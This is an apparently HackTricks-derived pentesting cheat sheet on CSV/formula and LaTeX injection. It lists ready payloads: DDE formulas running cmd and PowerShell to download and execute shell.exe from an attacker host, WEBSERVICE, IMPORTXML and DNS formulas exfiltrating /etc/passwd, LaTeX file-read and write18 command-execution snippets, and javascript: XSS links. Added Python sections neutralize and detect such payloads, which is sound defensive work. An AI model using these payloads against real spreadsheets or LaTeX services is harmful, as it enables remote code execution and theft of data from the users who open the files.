# Formula/CSV/Doc/LaTeX Injection
☁️ HackTricks Cloud ☁️ - 🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? Or do you want access to the latest version of PEASS or to download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the Telegram group, or follow me on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and the hacktricks-cloud repo.
Find the most important vulnerabilities so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, and finds issues across your whole tech stack, from APIs to web apps and cloud systems. Try it free today.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
## Formula Injection
### Info
If your input is reflected inside CSV files (or any other file that is likely to be opened by Excel), you may be able to place Excel formulas that are executed when the user opens the file or when the user clicks a link inside the Excel sheet.
{% hint style="danger" %} Nowadays Excel alerts the user (several times) when content is loaded from outside Excel, in order to prevent malicious actions. Therefore, special social-engineering effort must be put into the final payload. {% endhint %}
### Dictionary
```
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
```
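On the defensive side, the standard mitigation when an application exports user-controlled text to CSV is to neutralize every cell that a spreadsheet would interpret as a formula. The Python below is an added example written for this page, not code from HackTricks or from any of the referenced sources: it prefixes cells whose first non-space character is one of `=`, `+`, `-`, `@`, tab or carriage return with a single quote (so the spreadsheet renders them as text) while leaving plain numeric values such as `-12.5` untouched, and quotes every field on output. The sample rows are constructed and the function names are my own.

```python
import csv
import io
import re

# Leading characters that Excel / LibreOffice / Google Sheets treat as the
# start of a formula (every payload in the dictionary above begins with one).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# A plain number (optionally signed, optionally decimal) is data, not a formula,
# so it must not be escaped even though it starts with "-" or "+".
NUMERIC_RE = re.compile(r"^[-+]?\d+(\.\d+)?$")


def neutralize_cell(value: str) -> str:
    """Return value prefixed with a single quote if a spreadsheet would
    otherwise evaluate it as a formula. Only ordinary spaces are skipped when
    looking at the first character, so a leading tab or CR still counts."""
    stripped = value.lstrip(" ")
    if stripped and stripped[0] in FORMULA_TRIGGERS and not NUMERIC_RE.match(stripped):
        return "'" + value
    return value


def export_csv(rows) -> str:
    """Serialize rows to CSV text with every cell neutralized and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(str(cell)) for cell in row])
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample: one attacker-shaped cell, one legitimate negative number.
    sample_rows = [
        ["name", "score"],
        ["=cmd|' /C calc'!A0", "-12.5"],
        ["Alice", "90"],
    ]
    print(export_csv(sample_rows), end="")
```

The check belongs at export time: the CSV file itself is inert, it is the spreadsheet that evaluates the cell, so the same neutralization covers the HYPERLINK and DDE variants alike. The single-quote prefix is visible to the user as text, which is the intended effect; if the column is meant to hold numbers, reject non-numeric input at the application layer instead of relying on the prefix.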
### Hyperlink
The following example is very useful for exfiltrating content from the final Excel sheet and for performing requests to arbitrary locations. However, it requires the user to click the link (and accept the warning prompts).
Example taken from https://payatu.com/csv-injection-basic-to-exploit
Let's assume an attack scenario against a school's student record management system. The application allows teachers to enter student details. The attacker gains access to the application and wants every teacher using the application to be compromised, so the attacker attempts a CSV injection attack through the web application.
The attacker needs to steal the details of other students, so the attacker uses the HYPERLINK formula while entering the student details.
When the teacher exports the CSV and clicks the hyperlink, the sensitive data is sent to the attacker's server.
The exported CSV file contains the malicious payload.
The student details are logged on the attacker's web server.
### RCE
For this example to work, the following configuration must be enabled:
File → Options → Trust Center → Trust Center Settings → External Content → Enable Dynamic Data Exchange Server Launch
or an old version of Excel must be used.
The good news is that this payload is executed automatically when the file is opened (if the user accepts the warnings).
It is possible to execute a calculator with the payload `=cmd|' /C calc'!xxx`
```
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```
### LFI
LibreOffice Calc
- This reads the first line of the local /etc/passwd file:
```
='file:///etc/passwd'#$passwd.A1
```
- Exfiltrate it:
```
=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))
```
- Exfiltrate more than one line:
```
=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))
```
- DNS exfiltration:
```
=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))
```
Analyzing the DNS exfiltration payload:
- `'file:///etc/passwd'#$passwd.A19` – reads line 19 of the local /etc/passwd file
- `ENCODEURL('file:///etc/passwd'#$passwd.A19)` – URL-encodes the returned data
- `MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41)` – similar to substring, reads the data from the 1st to the 41st character; a very handy way of staying within the DNS hostname length limits (254 characters for the FQDN and 63 characters per label, i.e. per subdomain)
- `SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")` – replaces every instance of % (URL-encoded special characters) with a dash so that only valid DNS characters are used
- `CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<FQDN>")` – concatenates the output of the file (after the processing above) with the FQDN (for which the attacker controls the authoritative host)
- `WEBSERVICE` – makes the request to this non-existent DNS name, which can then be parsed from the logs of the authoritative DNS name server (or by running tcpdump etc.) under the attacker's control
### Google Sheets OOB Data Exfiltration
First, let's introduce some of the more interesting functions.
CONCATENATE: appends strings to one another.
```
=CONCATENATE(A2:E2)
```
IMPORTXML: imports data from various structured data types including XML, HTML, CSV, TSV, and RSS and ATOM XML feeds.
```
=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
```
IMPORTFEED: imports an RSS or ATOM feed.
```
=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))
```
IMPORTHTML: imports data from a table or list within an HTML page.
```
=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
```
IMPORTRANGE: imports a range of cells from a specified spreadsheet.
```
=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
```
IMAGE: inserts an image into a cell.
```
=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")
```
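For detection rather than prevention, the same trigger-character rule can be combined with a few patterns that separate the payload classes shown on this page (DDE command launches, LibreOffice `file:///` references, and the WEBSERVICE/IMPORT*/IMAGE/HYPERLINK family that makes the spreadsheet fetch or send data). The Python below is an added example written for this page, not code from HackTricks or from the referenced sources; the category names and regular expressions are my own, and the sample CSV is constructed from the payload shapes above with `logger.example` as a placeholder host. It can be run over uploaded or exported CSV files to flag cells that a spreadsheet would evaluate.

```python
import csv
import io
import re

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
NUMERIC_RE = re.compile(r"^[-+]?\d+(\.\d+)?$")

# Each classifier names a payload class seen on this page. A cell may match
# several (e.g. WEBSERVICE wrapped around a local file reference).
CLASSIFIERS = [
    # DDE / command launch: DDE(...), cmd|..., or the |'topic'! application syntax
    ("dde", re.compile(r"DDE\s*\(|\bcmd\s*\||\|\s*'[^']*'\s*!", re.IGNORECASE)),
    # LibreOffice external-sheet reference pointing at a local file
    ("local-file", re.compile(r"'file:///[^']*'\s*#", re.IGNORECASE)),
    # Functions that make the spreadsheet fetch from or send to the network
    ("external-fetch", re.compile(
        r"\b(?:WEBSERVICE|IMPORTXML|IMPORTFEED|IMPORTHTML|IMPORTRANGE|IMAGE|HYPERLINK)\s*\(",
        re.IGNORECASE)),
]


def classify_cell(cell: str):
    """Return the payload classes a cell matches: [] for plain data,
    ["formula"] for a formula that matches no specific class."""
    s = cell.lstrip(" ")
    if not s or s[0] not in FORMULA_TRIGGERS or NUMERIC_RE.match(s):
        return []
    tags = [name for name, rx in CLASSIFIERS if rx.search(s)]
    return tags or ["formula"]


def scan_csv(text: str):
    """Return (row, column, tags) for every cell a spreadsheet would evaluate."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            tags = classify_cell(cell)
            if tags:
                findings.append((r, c, tags))
    return findings


# Constructed sample CSV built from the payload shapes shown on this page;
# logger.example is a placeholder host, not a real collector.
SAMPLE_CSV = '''student,note
Alice,-5
"=cmd|' /C calc'!A0",x
"=WEBSERVICE(CONCATENATE(""http://:8080/"",('file:///etc/passwd'#$passwd.A1)))",x
"=IMAGE(""http://logger.example/logo.png"")",x
=SUM(1;2),x
'''

if __name__ == "__main__":
    for row, col, tags in scan_csv(SAMPLE_CSV):
        print(f"row {row} col {col}: {', '.join(tags)}")
```

The classes are deliberately coarse: the point is triage (a `dde` hit in an upload deserves a different response from a plain `formula`), not a complete grammar of spreadsheet functions, and a cell that carries only a generic formula is still worth blocking at export time.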
## LaTeX Injection
Usually the servers found on the internet that convert LaTeX code to PDF use `pdflatex`. This program uses 3 main attributes to (dis)allow command execution:
- `--no-shell-escape`: Disables the `\write18{command}` construct, even if it is enabled in the texmf.cnf file.
- `--shell-restricted`: Same as `--shell-escape`, but limited to a predefined set of "safe" commands (on Ubuntu 16.04 the list is in `/usr/share/texmf/web2c/texmf.cnf`).
- `--shell-escape`: Enables the `\write18{command}` construct. The command can be any shell command. This construct is normally disallowed for security reasons.
However, there are other ways to execute commands, so to avoid remote command execution (RCE) it is very important to use `--shell-restricted`.
### Read file
You might need to adjust the injection with wrappers such as `[` or `$`.
```latex
\input{/etc/passwd}
\include{password} % load .tex file
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}
```
### Read single-line file
```latex
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```
### Read multi-line file
```latex
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
```
### Write file
```latex
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
```
### Command execution
The input of the command is redirected to stdin; use a temporary file to get it.
```latex
\immediate\write18{env > output}
\input{output}
\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}
# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}
# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}
```
If you get any LaTeX error, consider using base64 to get the result without bad characters.
```latex
\immediate\write18{env | base64 > test.tex}
\input{test.tex}
\input|ls|base64
\input{|"/bin/hostname"}
```
### Cross Site Scripting
From @EdOverflow
```latex
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```
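A service that compiles untrusted LaTeX has two controls that follow directly from the sections above: invoke `pdflatex` with shell escape disabled or restricted, and screen the submitted document for the primitives used in the file-read, file-write, command-execution and XSS examples before it reaches the compiler. The Python below is an added example written for this page, not code from HackTricks or from any referenced project: `pdflatex_argv` builds the command line (the `-no-shell-escape`, `-shell-restricted`, `-interaction=nonstopmode`, `-halt-on-error` and `-output-directory=` options are real pdflatex options), and `screen_latex` reports which line of a document contains which class of dangerous construct. The category names and patterns are my own, and the sample document is constructed from the payloads shown above.

```python
import re

# Ordered list of (category, pattern). Patterns are raw strings, so r"\\" is
# one literal backslash in the scanned LaTeX source.
PATTERNS = [
    # \write18{...} with or without \immediate: the shell-escape primitive
    ("shell-escape", re.compile(r"\\(?:immediate\s*\\)?write18\s*\{")),
    # \input{|"cmd"} / \input|cmd: piped input, which still runs whitelisted
    # commands under restricted shell escape
    ("piped-input", re.compile(r"\\input\s*\{?\s*\|")),
    # primitives and macros that pull an arbitrary file into the document
    ("file-read", re.compile(r"\\(?:input|include|lstinputlisting|verbatiminput|openin)\b")),
    # primitives that create files on the build host
    ("file-write", re.compile(r"\\(?:openout|newwrite)\b")),
    # javascript: targets in hyperref links, clickable in PDF viewers
    ("js-link", re.compile(r"\\(?:url|href)\s*\{\s*javascript:", re.IGNORECASE)),
]


def screen_latex(tex: str):
    """Return [(line_number, [categories])] for each line holding a dangerous construct."""
    findings = []
    for lineno, line in enumerate(tex.splitlines(), start=1):
        hits = [name for name, rx in PATTERNS if rx.search(line)]
        if hits:
            findings.append((lineno, hits))
    return findings


def pdflatex_argv(tex_file: str, output_dir: str, restricted: bool = False):
    """Build the pdflatex command line. restricted=False disables shell escape
    entirely; restricted=True keeps the texmf.cnf whitelist of commands."""
    mode = "-shell-restricted" if restricted else "-no-shell-escape"
    return [
        "pdflatex",
        mode,
        "-interaction=nonstopmode",
        "-halt-on-error",
        f"-output-directory={output_dir}",
        tex_file,
    ]


# Constructed sample document mixing harmless markup with constructs from the
# sections above.
SAMPLE_TEX = r"""\documentclass{article}
\begin{document}
Hello \textbf{world}.
\immediate\write18{env > output}
\input{|"/bin/hostname"}
\openin\file=/etc/passwd
\url{javascript:alert(1)}
\end{document}
"""

if __name__ == "__main__":
    for lineno, hits in screen_latex(SAMPLE_TEX):
        print(f"line {lineno}: {', '.join(hits)}")
    print(" ".join(pdflatex_argv("job.tex", "/tmp/out")))
```

The screen is a secondary control: TeX lets a document rebuild macro names at runtime, so a denylist can be evaded and should only add logging and early rejection on top of the compiler flag. The flag plus an isolated build environment (separate user, no network, a throwaway output directory) is the primary one, which is why `pdflatex_argv` defaults to disabling shell escape entirely and only falls back to the restricted whitelist when the service genuinely needs one of those commands.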
## References
- https://notsosecure.com/data-exfiltration-formula-injection-part1
- https://0day.work/hacking-with-latex/
- https://salmonsec.com/cheatsheet/latex_injection
- https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/